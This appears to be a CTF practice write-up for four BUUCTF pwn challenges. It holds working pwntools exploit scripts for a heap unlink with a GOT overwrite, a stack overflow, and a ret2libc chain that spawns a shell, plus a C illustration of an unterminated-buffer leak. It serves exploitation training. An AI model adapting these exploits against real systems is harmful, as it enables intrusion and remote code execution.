PWN-PRACTICE-BUUCTF-22
- hitcontraining_unlink
- picoctf_2018_leak_me
- suctf_2018_basic pwn
- axb_2019_brop64
hitcontraining_unlink
Heap unlink; reference: [BUUCTF]PWN——hitcontraining_unlink

```python
# -*- coding:utf-8 -*-
from pwn import *

#io=process("./bamboobox")
io=remote("node4.buuoj.cn",25178)
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")

def show():
    io.sendlineafter(b"Your choice:",b"1")

def add(name_len,name):
    io.sendlineafter(b"Your choice:",b"2")
    io.sendlineafter(b"the length of item name:",str(name_len).encode())
    io.sendlineafter(b"the name of item:",name)

def edit(index,name_len,name):
    io.sendlineafter(b"Your choice:",b"3")
    io.sendlineafter(b"the index of item:",str(index).encode())
    io.sendlineafter(b"the length of item name:",str(name_len).encode())
    io.sendlineafter(b"the new name of the item:",name)

def free(index):
    io.sendlineafter(b"Your choice:",b"4")
    io.sendlineafter(b"the index of item:",str(index).encode())

def exit():
    io.sendlineafter(b"Your choice:",b"5")

#gdb.attach(io)
#pause()
add(0x40,b"aaaa")
add(0x80,b"bbbb")
add(0x80,b"cccc")
#pause()
# itemlist slot holding item 0's pointer; the fake chunk's fd/bk point back at it
ptr=0x00000000006020C8
fd=ptr-0x18
bk=ptr-0x10
payload=p64(0)+p64(0x40)+p64(fd)+p64(bk)
payload=payload.ljust(0x40,b"A")
payload+=p64(0x40)+p64(0x90)   # chunk 1's prev_size and size (PREV_INUSE cleared)
edit(0,len(payload),payload)
#pause()
free(1)   # backward consolidation unlinks the fake chunk: *ptr = ptr-0x18
#pause()
atoi_got=elf.got["atoi"]
payload=p64(0)*2+p64(0x40)+p64(atoi_got)   # item 0's pointer now = atoi@got
edit(0,len(payload),payload)
#pause()
show()
io.recvuntil(b"0 : ")
atoi_addr=u64(io.recv(6).ljust(8,b"\x00"))
print("atoi_addr=="+hex(atoi_addr))
libc_base=atoi_addr-libc.sym["atoi"]
system=libc_base+libc.sym["system"]
#pause()
edit(0,0x08,p64(system))   # atoi@got -> system
#pause()
io.sendlineafter(b"Your choice:",b"/bin/sh\x00")   # menu's atoi() now runs system()
io.interactive()
```

picoctf_2018_leak_me
v5 is a 256-byte char array; directly after it, at a higher address, sits the char array s, into which the program reads password.txt.
Later the program calls puts(v5), and puts only stops printing when it reaches a "\x00".
Fill all 256 bytes of v5 with "a" and send no trailing newline "\n", so no "\x00" is placed at the end.
puts(v5) then prints the password along with the name.
nc to the server again and enter the correct password to get the flag.
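The unterminated-buffer bug described above, as an added C illustration that is not part of the original writeup: a 256-byte name buffer sits directly before the buffer holding the password, the unsafe reader copies bytes without writing a terminator, and the hardened reader reserves one byte for it. The flat `mem` layout, the helper names and the "constructed-secret" string are constructed assumptions.

```c
#include <stdio.h>
#include <string.h>

#define NAME_SZ 256
#define SECRET_SZ 64
/* Constructed layout mirroring the writeup: v5 (the name) is followed
 * immediately by s (the password read from password.txt). One flat
 * object keeps the strlen() below well-defined. */
struct frame { char mem[NAME_SZ + SECRET_SZ]; };
#define NAME_OF(f)   ((f)->mem)
#define SECRET_OF(f) ((f)->mem + NAME_SZ)

/* Vulnerable pattern: read(0, v5, 256) semantics, no terminator.
 * Returns the number of bytes puts(v5) would print. */
size_t read_name_unsafe(struct frame *f, const char *in, size_t n)
{
    if (n > NAME_SZ) n = NAME_SZ;
    memcpy(NAME_OF(f), in, n);      /* 256 non-NUL bytes: no '\0' in v5 */
    return strlen(NAME_OF(f));      /* strlen runs on into s */
}

/* Hardened: reserve the last byte and always terminate. */
size_t read_name_safe(struct frame *f, const char *in, size_t n)
{
    if (n > NAME_SZ - 1) n = NAME_SZ - 1;
    memcpy(NAME_OF(f), in, n);
    NAME_OF(f)[n] = '\0';           /* puts() now stops inside v5 */
    return strlen(NAME_OF(f));
}

/* Fills the frame with a constructed secret, feeds `count` 'a' bytes
 * through either reader and returns how much puts(v5) would emit. */
size_t demo(size_t count, int hardened)
{
    struct frame f;
    char in[512];
    memset(&f, 0, sizeof f);
    strcpy(SECRET_OF(&f), "constructed-secret");   /* stands in for password.txt */
    memset(in, 'a', sizeof in);
    return hardened ? read_name_safe(&f, in, count)
                    : read_name_unsafe(&f, in, count);
}

int main(void)
{
    printf("unsafe, 256 bytes: puts prints %zu bytes\n", demo(256, 0));
    printf("safe,   256 bytes: puts prints %zu bytes\n", demo(256, 1));
    return 0;
}
```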
suctf_2018_basic pwn
Stack overflow

```python
from pwn import *

#io=process('./SUCTF_2018_basic_pwn')
io=remote('node4.buuoj.cn',26502)
flag_addr=0x401157   # function that prints the flag
payload=b'a'*(0x110+8)+p64(flag_addr)   # buffer + saved rbp, then return address
io.sendline(payload)
io.interactive()
```

axb_2019_brop64
Stack overflow, ret2libc

```python
from pwn import *
context.log_level="debug"

#io=process('./axb_2019_brop64')
io=remote('node4.buuoj.cn',29347)
elf=ELF('./axb_2019_brop64')
libc=ELF('./libc-2.23-x64.so')

main=0x4007d6
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi=0x400963

# stage 1: leak puts@got through puts, then return to main
io.recvuntil(b'Please tell me:')
payload=b'a'*(0xd0+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.sendline(payload)
puts_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base=puts_addr-libc.sym['puts']
system=libc_base+libc.sym['system']
binsh=libc_base+next(libc.search(b'/bin/sh\x00'))

# stage 2: system("/bin/sh")
io.recvuntil(b'Please tell me:')
payload=b'a'*0xd8+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)
io.sendline(payload)
io.interactive()
```